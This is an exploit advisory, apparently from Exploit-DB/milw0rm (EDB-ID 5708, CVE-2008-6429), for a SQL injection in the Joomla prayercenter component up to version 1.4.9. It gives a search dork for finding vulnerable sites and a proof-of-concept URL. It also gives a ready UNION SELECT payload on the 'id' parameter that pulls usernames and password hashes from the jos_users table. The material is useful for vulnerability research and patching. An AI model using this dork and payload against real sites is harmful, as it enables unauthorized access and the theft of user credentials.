Joomla Component prayercenter <= 1.4.9 id SQL Injection Vulnerability

2008-05-31T00:00:00
ID EDB-ID:5708
Type exploitdb
Reporter His0k4
Modified 2008-05-31T00:00:00

Description

Joomla Component prayercenter <= 1.4.9 (id) SQL Injection Vulnerability. CVE-2008-6429. Webapps exploit for php platform

                                        
                                            /---------------------------------------------------------------\
\                                				/
/      Joomla Component  prayercenter  Remote SQL injection     \
\                                				/
\---------------------------------------------------------------/


[*] Author    :  His0k4 [ALGERIAN HaCkEr]

[*] Dork      :  inurl:"com_prayercenter"

[*] POC        : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id={SQL}

[*] Example    : http://localhost/[Joomla_Path]/index2.php?option=com_prayercenter&task=view_request&id=-1 UNION SELECT user(),user(),concat(username,0x3a,password),user(),user(),user(),user(),user(),user(),user(),user(),user(),user() FROM jos_users--

[*] Note       : Sometimes you need to register for doing this exploit
                
----------------------------------------------------------------------------
[*] Greetings :  Str0ke, all friends & muslims HaCkeRs...
[*] Greetings2 : http://www.palcastle.org/cc

# milw0rm.com [2008-05-31]